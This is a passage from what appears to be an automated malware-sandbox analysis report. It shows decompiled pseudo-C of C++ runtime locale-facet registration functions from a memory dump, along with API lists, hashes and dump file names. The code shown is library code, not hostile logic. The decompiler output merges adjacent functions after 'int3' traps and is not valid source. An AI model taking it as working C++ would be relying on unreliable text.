																																					 *(_t550 - 4) = 1;
																																					E6D486FD3(__eflags, _t522);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6d546e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6D486FD3(__eflags, _t521);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6d546dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6D486FD3(__eflags, _t520);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6d546dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6D486FD3(__eflags, _t519);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6d546de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6D486FD3(__eflags, _t518);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6d546ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6D486FD3(__eflags, _t517);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6d546db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6D486FD3(__eflags, _t516);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6d546dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6D486FD3(__eflags, _t515);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6d546dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6D486FD3(__eflags, _t514);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6d546dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6D486FD3(__eflags, _t513);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6d546df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6D486FD3(__eflags, _t512);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6d546df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F56E
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F578
int.LIBCPMT ref: 6D48F58F

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F5B2
std::_Facet_Register.LIBCPMT ref: 6D48F5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F607

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 49ef3f7939af933b9f45587e5b48566a3b506f17f71705eaac13e3b5f31d0469
Instruction ID: fc57140990ea0202da84e4f65ebf44c77a17b3a9f06320308032cc42259a1d29
Opcode Fuzzy Hash: 49ef3f7939af933b9f45587e5b48566a3b506f17f71705eaac13e3b5f31d0469
Instruction Fuzzy Hash: A31123358082169BCF05EB60C840EEDB774AF90354F2A000CD612A7382DB70DD0087D2

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B74C, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t374 - 0x14, 0);
				_t357 =  *0x6d546e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6D46161C(0x6d546e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6D4866BA(_t374 - 0x14);
					return E6D4A0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6D49BF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t374 - 0x20);
							E6D4A3D74(_t374 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t348, _t357, 0x14);
							E6D486653(_t374 - 0x14, 0);
							_t358 =  *0x6d546e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6D46161C(0x6d546e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6D4866BA(_t374 - 0x14);
								return E6D4A0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6D49BFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t374 - 0x20);
										E6D4A3D74(_t374 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t265, _t349, _t358, 0x14);
										E6D486653(_t374 - 0x14, 0);
										_t359 =  *0x6d546e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6D46161C(0x6d546e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6D4866BA(_t374 - 0x14);
											return E6D4A0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6D49C050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t374 - 0x20);
													E6D4A3D74(_t374 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t265, _t350, _t359, 0x14);
													E6D486653(_t374 - 0x14, 0);
													_t360 =  *0x6d546e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6D46161C(0x6d546e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6D4866BA(_t374 - 0x14);
														return E6D4A0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6D49C0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t374 - 0x20);
																E6D4A3D74(_t374 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t265, _t351, _t360, 0x14);
																E6D486653(_t374 - 0x14, 0);
																_t361 =  *0x6d546e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6D46161C(0x6d546e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6D4866BA(_t374 - 0x14);
																	return E6D4A0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6D49C120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t374 - 0x20);
																			E6D4A3D74(_t374 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t265, _t352, _t361, 0x14);
																			E6D486653(_t374 - 0x14, 0);
																			_t362 =  *0x6d546e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6D46161C(0x6d546e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6D4866BA(_t374 - 0x14);
																				return E6D4A0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6D49C1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t374 - 0x20);
																						E6D4A3D74(_t374 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t265, _t353, _t362, 0x14);
																						E6D486653(_t374 - 0x14, 0);
																						_t363 =  *0x6d546e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6D46161C(0x6d546e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6D4866BA(_t374 - 0x14);
																							return E6D4A0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6D49C229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t374 - 0x20);
																									E6D4A3D74(_t374 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t265, _t354, _t363, 0x14);
																									E6D486653(_t374 - 0x14, 0);
																									_t364 =  *0x6d546e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6D46161C(0x6d546e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6D4866BA(_t374 - 0x14);
																										return E6D4A0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6D49C295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6D461438(_t321);
																												E6D4A3D74(_t374 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6d4ec414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6D49D028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6D4A0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6D486FD3(__eflags, _t355);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6d546e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6D486FD3(__eflags, _t354);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6d546e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6D486FD3(__eflags, _t353);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6d546e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6D486FD3(__eflags, _t352);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6d546e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6D486FD3(__eflags, _t351);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6d546e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6D486FD3(__eflags, _t350);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6d546e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6D486FD3(__eflags, _t349);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6d546e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6D486FD3(__eflags, _t348);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6d546e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D49B753
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B75D
int.LIBCPMT ref: 6D49B774

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

collate.LIBCPMT ref: 6D49B797
std::_Facet_Register.LIBCPMT ref: 6D49B7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B7EC

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: f4b17ddb62fc5118fad6481cb4514515559a233d4ccb54783bf0e60cdb5878a2
Instruction ID: 39923b3018d07ab18c7de53b7cd2f0490ee351f98b6dfcc59feef0ada1d8220b
Opcode Fuzzy Hash: f4b17ddb62fc5118fad6481cb4514515559a233d4ccb54783bf0e60cdb5878a2
Instruction Fuzzy Hash: 351106768081199BCF05EB60C880FEEBBB5AF94314F2A414CE611BB390DB70DD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t330 - 0x14, 0);
				_t315 =  *0x6d546e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6D46161C(0x6d546e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6D4866BA(_t330 - 0x14);
					return E6D4A0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6D49BFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t330 - 0x20);
							E6D4A3D74(_t330 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t307, _t315, 0x14);
							E6D486653(_t330 - 0x14, 0);
							_t316 =  *0x6d546e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6D46161C(0x6d546e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6D4866BA(_t330 - 0x14);
								return E6D4A0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6D49C050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t330 - 0x20);
										E6D4A3D74(_t330 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t234, _t308, _t316, 0x14);
										E6D486653(_t330 - 0x14, 0);
										_t317 =  *0x6d546e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6D46161C(0x6d546e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6D4866BA(_t330 - 0x14);
											return E6D4A0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6D49C0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t330 - 0x20);
													E6D4A3D74(_t330 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t234, _t309, _t317, 0x14);
													E6D486653(_t330 - 0x14, 0);
													_t318 =  *0x6d546e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6D46161C(0x6d546e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6D4866BA(_t330 - 0x14);
														return E6D4A0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6D49C120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t330 - 0x20);
																E6D4A3D74(_t330 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t234, _t310, _t318, 0x14);
																E6D486653(_t330 - 0x14, 0);
																_t319 =  *0x6d546e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6D46161C(0x6d546e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6D4866BA(_t330 - 0x14);
																	return E6D4A0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6D49C1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t330 - 0x20);
																			E6D4A3D74(_t330 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t234, _t311, _t319, 0x14);
																			E6D486653(_t330 - 0x14, 0);
																			_t320 =  *0x6d546e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6D46161C(0x6d546e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6D4866BA(_t330 - 0x14);
																				return E6D4A0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6D49C229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t330 - 0x20);
																						E6D4A3D74(_t330 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t234, _t312, _t320, 0x14);
																						E6D486653(_t330 - 0x14, 0);
																						_t321 =  *0x6d546e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6D46161C(0x6d546e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6D4866BA(_t330 - 0x14);
																							return E6D4A0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6D49C295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6D461438(_t283);
																									E6D4A3D74(_t330 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6d4ec414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6D49D028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6D4A0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6D486FD3(__eflags, _t313);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6d546e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6D486FD3(__eflags, _t312);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6d546e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6D486FD3(__eflags, _t311);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6d546e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6D486FD3(__eflags, _t310);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6d546e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6D486FD3(__eflags, _t309);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6d546e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
